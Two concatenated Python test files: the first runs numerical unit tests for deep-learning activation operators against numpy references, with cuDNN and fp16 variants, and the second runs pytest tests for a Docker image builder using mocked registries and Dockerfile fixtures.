        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.exp(x_np)}

    def test_check_output(self):
        """Forward output must match the numpy reference."""
        self.check_output()

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)

    def init_dtype(self):
        # Overridden by dtype-specific subclasses.
        self.dtype = np.float32

    def init_kernel_type(self):
        # Hook for kernel-specific subclasses; no-op by default.
        pass
class TestSigmoid(TestActivation):
    """Test the ``sigmoid`` op: out = 1 / (1 + exp(-x))."""

    def setUp(self):
        self.op_type = "sigmoid"
        self.init_dtype()

        x_np = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        ref = 1 / (1 + np.exp(-x_np))

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.01)
class TestLogSigmoid(TestActivation):
    """Test the ``logsigmoid`` op: out = log(1 / (1 + exp(-x)))."""

    def setUp(self):
        self.op_type = "logsigmoid"
        self.init_dtype()

        x_np = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        ref = np.log(1 / (1 + np.exp(-x_np)))

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.008)
class TestTanh(TestActivation):
    """Test the ``tanh`` op against numpy's tanh."""

    def setUp(self):
        self.op_type = "tanh"
        self.init_dtype()

        x_np = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.tanh(x_np)}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAtan(TestActivation):
    """Test the ``atan`` op against numpy's arctan."""

    def setUp(self):
        self.op_type = "atan"
        self.init_dtype()

        x_np = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.arctan(x_np)}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestTanhShrink(TestActivation):
    """Test the ``tanh_shrink`` op: out = x - tanh(x)."""

    def setUp(self):
        self.op_type = "tanh_shrink"
        self.init_dtype()

        x_np = np.random.uniform(0.1, 1, [10, 17]).astype(self.dtype)
        ref = x_np - np.tanh(x_np)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.008)
class TestHardShrink(TestActivation):
    """Test the ``hard_shrink`` op: values inside [-lambda, lambda] are
    zeroed, everything else passes through unchanged."""

    def setUp(self):
        self.op_type = "hard_shrink"
        self.init_dtype()

        lam = 0.5
        x_np = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        ref = np.copy(x_np)
        ref[(ref >= -lam) & (ref <= lam)] = 0

        self.attrs = {'lambda': lam}
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.005)
class TestSoftShrink(TestActivation):
    """Test the ``softshrink`` op: out = x -/+ lambda outside the
    [-lambda, lambda] band, 0 inside it."""

    def setUp(self):
        self.op_type = "softshrink"
        self.init_dtype()

        lambda_val = 0.1
        x_np = np.random.uniform(0.25, 10, [4, 4]).astype(self.dtype)
        ref = np.copy(x_np)
        ref = (ref < -lambda_val) * (ref + lambda_val) + (ref > lambda_val) * (
            ref - lambda_val)

        self.attrs = {'lambda': lambda_val}
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSqrt(TestActivation):
    """Test the ``sqrt`` op against numpy's sqrt."""

    def setUp(self):
        self.op_type = "sqrt"
        self.init_dtype()

        x_np = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.sqrt(x_np)}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestRsqrt(TestActivation):
    """Test the ``rsqrt`` op: out = 1 / sqrt(x)."""

    def setUp(self):
        self.op_type = "rsqrt"
        self.init_dtype()

        x_np = np.random.uniform(0.1, 1, [2, 3]).astype(self.dtype)
        ref = 1.0 / np.sqrt(x_np)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': ref}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.0005)
class TestAbs(TestActivation):
    """Test the ``abs`` op against numpy's abs."""

    def setUp(self):
        self.op_type = "abs"
        self.init_dtype()

        x_np = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        # Because we set delta = 0.005 in calculating numeric gradient,
        # if x is too small, such as 0.002, x_neg will be -0.003 and
        # x_pos will be 0.007, so the numeric gradient is inaccurate.
        # Push near-zero samples away from the non-differentiable point.
        x_np[np.abs(x_np) < 0.005] = 0.02

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.abs(x_np)}

    def test_check_grad(self):
        # Gradient checking is skipped for float16.
        if self.dtype == np.float16:
            return
        self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestCeil(TestActivation):
    """Test the ``ceil`` op against numpy's ceil (forward only)."""

    def setUp(self):
        self.op_type = "ceil"
        self.init_dtype()

        x_np = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x_np)}
        self.outputs = {'Out': np.ceil(x_np)}

    def test_check_grad(self):
        # No gradient check — same reason as TestFloor: the gradient of
        # ceil is undefined, and the op returns zero where numpy gives nan.
        pass
class TestFloor(TestActivation):
    """Forward test for the `floor` activation: Out = floor(X)."""

    def setUp(self):
        self.op_type = "floor"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.floor(data)}

    def test_check_grad(self):
        # The gradient of floor/ceil/round is mathematically undefined;
        # the op returns zero while numpy would produce NaN, so the
        # gradient check is skipped.
        pass
class TestCos(TestActivation):
    """Forward/backward test for the `cos` activation: Out = cos(X)."""

    def setUp(self):
        self.op_type = "cos"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.cos(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAcos(TestActivation):
    """Forward/backward test for the `acos` activation: Out = arccos(X)."""

    def setUp(self):
        self.op_type = "acos"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.arccos(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSin(TestActivation):
    """Forward/backward test for the `sin` activation: Out = sin(X)."""

    def setUp(self):
        self.op_type = "sin"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.sin(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAsin(TestActivation):
    """Forward/backward test for the `asin` activation: Out = arcsin(X)."""

    def setUp(self):
        self.op_type = "asin"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.arcsin(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestRound(TestActivation):
    """Forward test for the `round` activation: Out = round(X)."""

    def setUp(self):
        self.op_type = "round"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.round(data)}

    def test_check_grad(self):
        # Gradient of round is undefined (zero in the op); check skipped.
        pass
class TestRelu(TestActivation):
    """Forward/backward test for the `relu` activation: Out = max(X, 0)."""

    def setUp(self):
        self.op_type = "relu"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        # Push samples away from the kink at 0 (same numeric-gradient
        # concern as TestAbs).
        data[np.abs(data) < 0.005] = 0.02
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.maximum(data, 0)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestLeakyRelu(TestActivation):
    """Forward/backward test for `leaky_relu`: Out = max(X, 0.02 * X)."""

    def setUp(self):
        self.op_type = "leaky_relu"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        # Push samples away from the kink at 0 (same concern as TestAbs).
        data[np.abs(data) < 0.005] = 0.02
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.maximum(data, 0.02 * data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestGelu(TestActivation):
    """Forward/backward test for `gelu`: Out = 0.5*X*(1 + erf(X/sqrt(2)))."""

    def setUp(self):
        self.op_type = "gelu"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': 0.5 * data * (1.0 + erf(data / np.sqrt(2.0)))}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestBRelu(TestActivation):
    """Forward/backward test for `brelu`: Out = clip(X, t_min, t_max)."""

    def setUp(self):
        self.op_type = "brelu"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
        t_min = 1.0
        t_max = 4.0
        # Keep samples away from both clipping thresholds (same
        # numeric-gradient concern as TestAbs).
        data[np.abs(data - t_min) < 0.005] = t_min + 0.02
        data[np.abs(data - t_max) < 0.005] = t_max + 0.02
        clipped = np.copy(data)
        clipped[clipped < t_min] = t_min
        clipped[clipped > t_max] = t_max

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'t_min': t_min, 't_max': t_max}
        self.outputs = {'Out': clipped}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestRelu6(TestActivation):
    """Forward/backward test for `relu6`: Out = min(max(X, 0), threshold)."""

    def setUp(self):
        self.op_type = "relu6"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [4, 10]).astype(self.dtype)
        threshold = 6.0
        # Keep samples away from both kinks (same concern as TestAbs).
        data[np.abs(data) < 0.005] = 0.02
        data[np.abs(data - threshold) < 0.005] = threshold + 0.02

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'threshold': threshold}
        self.outputs = {'Out': np.minimum(np.maximum(data, 0), threshold)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestHardSwish(TestActivation):
    """Test `hard_swish`: Out = X * clip(X + offset, 0, threshold) / scale."""

    def setUp(self):
        self.op_type = 'hard_swish'
        self.init_dtype()

        data = np.random.uniform(-6, 6, [4, 4]).astype(self.dtype)
        threshold = 6.0
        scale = 6.0
        offset = 3.0
        # Keep samples away from both kinks (same concern as TestAbs).
        data[np.abs(data + offset) < 0.005] = 0.02
        data[np.abs(data - threshold + offset) < 0.005] = threshold - offset + 0.02
        expected = data * np.minimum(np.maximum(data + offset, 0), threshold) / scale

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'threshold': threshold, 'scale': scale, 'offset': offset}
        self.outputs = {'Out': expected}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestSoftRelu(TestActivation):
    """Test `soft_relu`: Out = log(1 + exp(clip(X, -threshold, threshold)))."""

    def setUp(self):
        self.op_type = "soft_relu"
        self.init_dtype()

        data = np.random.uniform(-3, 3, [4, 4]).astype(self.dtype)
        threshold = 2.0
        # Keep samples away from both clipping points (same concern as
        # TestAbs).
        data[np.abs(data - threshold) < 0.005] = threshold + 0.02
        data[np.abs(data + threshold) < 0.005] = -threshold + 0.02
        clipped = np.copy(data)
        clipped[clipped < -threshold] = -threshold
        clipped[clipped > threshold] = threshold

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'threshold': threshold}
        self.outputs = {'Out': np.log((np.exp(clipped) + 1))}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestELU(TestActivation):
    """Test `elu`: Out = max(0, X) + min(0, alpha * (exp(X) - 1))."""

    def setUp(self):
        self.op_type = "elu"
        self.init_dtype()

        data = np.random.uniform(-3, 3, [4, 4]).astype(self.dtype)
        alpha = 1.
        # Unlike the other ReLU variants, standard ELU (alpha = 1) is
        # differentiable at 0, so no sample nudging such as
        # data[np.abs(data) < 0.005] = 0.02 is needed here.
        expected = np.maximum(0, data) + np.minimum(0, alpha * (np.exp(data) - 1))

        self.inputs = {'X': data}
        self.attrs = {'alpha': alpha}
        self.outputs = {'Out': expected}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestReciprocal(TestActivation):
    """Forward/backward test for `reciprocal`: Out = 1 / X."""

    def setUp(self):
        self.op_type = "reciprocal"
        self.init_dtype()

        data = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.reciprocal(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.01)
class TestLog(TestActivation):
    """Forward/backward test for the `log` activation: Out = log(X)."""

    def setUp(self):
        self.op_type = "log"
        self.init_dtype()

        data = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.log(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSquare(TestActivation):
    """Forward/backward test for the `square` activation: Out = X**2."""

    def setUp(self):
        self.op_type = "square"
        self.init_dtype()

        data = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.square(data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestPow(TestActivation):
    """Test `pow` with the exponent supplied via the `factor` attribute."""

    def setUp(self):
        self.op_type = "pow"
        self.init_dtype()

        data = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'factor': 3.0}
        self.outputs = {'Out': np.power(data, 3)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestPow_factor_tensor(TestActivation):
    """Test `pow` with the exponent supplied via the FactorTensor input."""

    def setUp(self):
        self.op_type = "pow"
        self.init_dtype()

        data = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
        self.inputs = {
            'X': OpTest.np_dtype_to_fluid_dtype(data),
            'FactorTensor': np.array([3.0]).astype("float32")
        }
        self.attrs = {}
        self.outputs = {'Out': np.power(data, 3)}

    def test_check_output(self):
        self.check_output()

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.02)

    def test_api(self):
        """End-to-end check of fluid.layers.pow with a float factor and a
        tensor factor."""
        import paddle.fluid as fluid

        np_input = np.random.uniform(1, 2, [11, 17]).astype("float32")
        x = fluid.layers.data(
            name="x", shape=[11, 17], append_batch_size=False, dtype="float32")
        factor_1 = 2.0
        factor_2 = fluid.layers.fill_constant([1], "float32", 3.0)
        out_1 = fluid.layers.pow(x, factor=factor_1)
        out_2 = fluid.layers.pow(x, factor=factor_2)

        exe = fluid.Executor(place=fluid.CPUPlace())
        res_1, res_2 = exe.run(fluid.default_main_program(),
                               feed={"x": np_input},
                               fetch_list=[out_1, out_2])
        assert np.array_equal(res_1, np.power(np_input, 2))
        assert np.array_equal(res_2, np.power(np_input, 3))
class TestSTanh(TestActivation):
    """Test `stanh`: Out = scale_b * tanh(scale_a * X)."""

    def setUp(self):
        self.op_type = "stanh"
        self.init_dtype()

        data = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
        scale_a = 2.0 / 3.0
        scale_b = 1.7159

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'scale_a': scale_a, 'scale_b': scale_b}
        self.outputs = {'Out': scale_b * np.tanh(data * scale_a)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSoftplus(TestActivation):
    """Test `softplus`: Out = log(1 + exp(X))."""

    def setUp(self):
        self.op_type = "softplus"
        self.init_dtype()
        # NOTE(review): dtype is forced to float64 *after* init_dtype(),
        # so dtype overrides from subclasses are deliberately ignored here.
        self.dtype = np.float64

        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.log(1 + np.exp(data))}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSoftsign(TestActivation):
    """Test `softsign`: Out = X / (1 + |X|)."""

    def setUp(self):
        self.op_type = "softsign"
        self.init_dtype()

        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.divide(data, 1 + np.abs(data))}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestThresholdedRelu(TestActivation):
    """Test `thresholded_relu`: Out = X if X > threshold else 0."""

    def setUp(self):
        self.op_type = "thresholded_relu"
        self.init_dtype()

        threshold = 0.25
        self.relative_error = 0.005
        data = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
        # Push samples away from the threshold kink (same concern as
        # TestAbs).
        data[np.abs(data - threshold) < self.relative_error] = threshold + 0.2

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'threshold': threshold}
        self.outputs = {'Out': (data > threshold) * data}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=self.relative_error)
class TestHardSigmoid(TestActivation):
    """Test `hard_sigmoid`: Out = clip(slope * X + offset, 0, 1)."""

    def setUp(self):
        self.op_type = "hard_sigmoid"
        self.init_dtype()
        self.relative_error = 0.002

        # NOTE(review): input is always generated as float32 here,
        # regardless of what init_dtype() selected.
        data = np.random.uniform(-5, 5, [2, 2]).astype("float32")
        slope = 0.2
        offset = 0.5
        lower_threshold = -offset / slope
        upper_threshold = (1 - offset) / slope
        # Keep samples away from both saturation points (same concern as
        # TestAbs).
        data[np.abs(data - lower_threshold) < self.relative_error] = \
            lower_threshold + 0.2
        data[np.abs(data - upper_threshold) < self.relative_error] = \
            upper_threshold - 0.2

        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.outputs = {'Out': np.maximum(0.0, np.minimum(1.0, data * slope + offset))}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.002)
class TestSwish(TestActivation):
    """Test `swish`: Out = X * sigmoid(beta * X)."""

    def setUp(self):
        self.op_type = "swish"
        self.init_dtype()

        data = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
        beta = 2.3
        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(data)}
        self.attrs = {'beta': beta}
        self.outputs = {'Out': data * expit(beta * data)}

    def test_check_grad(self):
        # Gradient check is skipped for fp16.
        if self.dtype != np.float16:
            self.check_grad(['X'], 'Out', max_relative_error=0.008)
#------------------ Test Cudnn Activation----------------------
def create_test_act_cudnn_class(parent, atol=1e-3, grad_atol=1e-3):
    """Derive a cuDNN-enabled variant of *parent* and register it globally.

    NOTE(review): `atol` and `grad_atol` are accepted but never used in
    this factory.
    """

    @unittest.skipIf(not core.is_compiled_with_cuda(),
                     "core is not compiled with CUDA")
    class TestActCudnn(parent):
        def init_kernel_type(self):
            self.attrs = {"use_cudnn": True}

    cls_name = "{0}_{1}".format(parent.__name__, "cudnn")
    TestActCudnn.__name__ = cls_name
    globals()[cls_name] = TestActCudnn
# Register cuDNN variants for the activations that have cuDNN kernels.
create_test_act_cudnn_class(TestRelu)
create_test_act_cudnn_class(TestRelu6)
create_test_act_cudnn_class(TestSigmoid)
create_test_act_cudnn_class(TestTanh)
#------------------ Test Fp16 ----------------------
def create_test_act_fp16_class(parent,
                               atol=1e-3,
                               grad_check=True,
                               grad_atol=0.80):
    """Derive an fp16 variant of *parent* and register it globally.

    Output/gradient checks only run on CUDA devices that support fp16;
    gradient checking can be disabled entirely via ``grad_check``.
    """

    @unittest.skipIf(not core.is_compiled_with_cuda(),
                     "core is not compiled with CUDA")
    class TestActFp16(parent):
        def init_dtype(self):
            self.dtype = np.float16

        def test_check_output(self):
            place = core.CUDAPlace(0)
            if core.is_float16_supported(place):
                self.check_output_with_place(place, atol=atol)

        def test_check_grad(self):
            place = core.CUDAPlace(0)
            support_fp16 = core.is_float16_supported(place)
            if support_fp16 and grad_check:
                self.check_grad_with_place(
                    place, ['X'], 'Out', max_relative_error=grad_atol)

    cls_name = "{0}_{1}".format(parent.__name__, "fp16")
    TestActFp16.__name__ = cls_name
    globals()[cls_name] = TestActFp16
# Register fp16 variants of every activation test, with per-op overrides:
# grad_check=False where the gradient is undefined (ceil/floor/round),
# looser atol/grad_atol where fp16 precision requires it.
create_test_act_fp16_class(TestActivation)
create_test_act_fp16_class(TestSigmoid)
create_test_act_fp16_class(TestLogSigmoid)
create_test_act_fp16_class(TestTanh)
create_test_act_fp16_class(TestTanhShrink)
create_test_act_fp16_class(TestHardShrink)
create_test_act_fp16_class(TestSoftShrink)
create_test_act_fp16_class(TestSqrt)
create_test_act_fp16_class(TestAbs)
create_test_act_fp16_class(TestCeil, grad_check=False)
create_test_act_fp16_class(TestFloor, grad_check=False)
create_test_act_fp16_class(TestCos, grad_atol=0.85)
create_test_act_fp16_class(TestAcos, grad_atol=0.85)
create_test_act_fp16_class(TestSin)
create_test_act_fp16_class(TestAsin)
create_test_act_fp16_class(TestAtan)
create_test_act_fp16_class(TestRound, grad_check=False)
create_test_act_fp16_class(TestRelu)
create_test_act_fp16_class(TestGelu)
create_test_act_fp16_class(TestBRelu)
create_test_act_fp16_class(TestRelu6)
create_test_act_fp16_class(TestSoftRelu)
create_test_act_fp16_class(TestELU)
create_test_act_fp16_class(TestReciprocal)
create_test_act_fp16_class(TestLog)
create_test_act_fp16_class(TestSquare)
create_test_act_fp16_class(TestPow, atol=5e-2)
create_test_act_fp16_class(TestPow_factor_tensor, atol=5e-2)
create_test_act_fp16_class(TestSTanh, grad_atol=0.9)
create_test_act_fp16_class(TestSoftplus)
create_test_act_fp16_class(TestSoftsign)
create_test_act_fp16_class(TestThresholdedRelu)
create_test_act_fp16_class(TestHardSigmoid)
create_test_act_fp16_class(TestSwish)
create_test_act_fp16_class(TestHardSwish)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| |
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import pytest
import atomic_reactor.util
import docker.errors
from atomic_reactor.build import InsideBuilder, BuildResult
from atomic_reactor.source import get_source_instance_for
from atomic_reactor.util import df_parser, DockerfileImages
from tests.constants import (
LOCALHOST_REGISTRY, MOCK, SOURCE,
DOCKERFILE_OK_PATH, DOCKERFILE_MULTISTAGE_PATH,
DOCKERFILE_MULTISTAGE_SCRATCH_PATH, DOCKERFILE_MULTISTAGE_CUSTOM_PATH,
DOCKERFILE_MULTISTAGE_CUSTOM_BAD_PATH
)
from atomic_reactor.constants import CONTAINER_DOCKERPY_BUILD_METHOD
from osbs.utils import ImageName
from tests.util import requires_internet
from flexmock import flexmock
from textwrap import dedent
if MOCK:
    from tests.docker_mock import mock_docker

# This stuff is used in tests; you have to have internet connection,
# running registry on port 5000 and it helps if you've pulled fedora:latest before
git_base_repo = "fedora"
git_base_tag = "latest"
git_base_image = ImageName(registry=LOCALHOST_REGISTRY, repo="fedora", tag="latest")

# Decorator: run the decorated test once per source definition
# (git SOURCE plus the path-based Dockerfile fixtures).
with_all_sources = pytest.mark.parametrize('source_params', [
    SOURCE,
    {'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH},
    {'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_PATH},
    {'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_SCRATCH_PATH},
    {'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_CUSTOM_PATH},
])

default_build_method = CONTAINER_DOCKERPY_BUILD_METHOD
@requires_internet
def test_different_custom_base_images(tmpdir):
    """InsideBuilder must reject a Dockerfile whose stages use two
    different custom base images."""
    if MOCK:
        mock_docker()
    source_params = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_CUSTOM_BAD_PATH,
                     'tmpdir': str(tmpdir)}
    s = get_source_instance_for(source_params)
    # Constructing the builder parses the Dockerfile and should raise.
    with pytest.raises(NotImplementedError) as exc:
        InsideBuilder(s, '')

    message = "multiple different custom base images aren't allowed in Dockerfile"
    assert message in str(exc.value)
@requires_internet
@with_all_sources
def test_inspect_built_image(tmpdir, source_params):
    """inspect_built_image() returns docker inspect data with an Id."""
    provided_image = "test-build:test_tag"
    if MOCK:
        mock_docker(provided_image_repotags=provided_image)

    # Pretend the image was already built so inspection does not fail.
    flexmock(InsideBuilder, ensure_is_built=None)
    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, provided_image)
    b.tasker.build_method = default_build_method
    built_inspect = b.inspect_built_image()

    assert built_inspect is not None
    assert built_inspect["Id"] is not None
@requires_internet
@with_all_sources
@pytest.mark.parametrize('insecure', [True, False])
@pytest.mark.parametrize('parents_pulled', [True, False])
def test_parent_image_inspect(insecure, parents_pulled, tmpdir, source_params):
    """parent_image_inspect() works whether parents were pulled locally or
    must be inspected via the registry."""
    provided_image = "test-build:test_tag"
    if MOCK:
        mock_docker(provided_image_repotags=provided_image)

    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, provided_image)
    b.tasker.build_method = default_build_method
    b.parents_pulled = parents_pulled

    provided_imagename = ImageName.parse(provided_image)
    registry_name = "registry.example.com"
    provided_imagename.registry = registry_name
    b.pull_registries = {registry_name: {'insecure': insecure, 'dockercfg_path': str(tmpdir)}}

    # When parents were not pulled, inspection must go through the
    # registry helper instead of the local docker daemon.
    if not parents_pulled:
        (flexmock(atomic_reactor.util)
         .should_receive('get_inspect_for_image')
         .with_args(provided_imagename, provided_imagename.registry, insecure, str(tmpdir))
         .and_return({'Id': 123}))

    built_inspect = b.parent_image_inspect(provided_imagename)
    assert built_inspect is not None
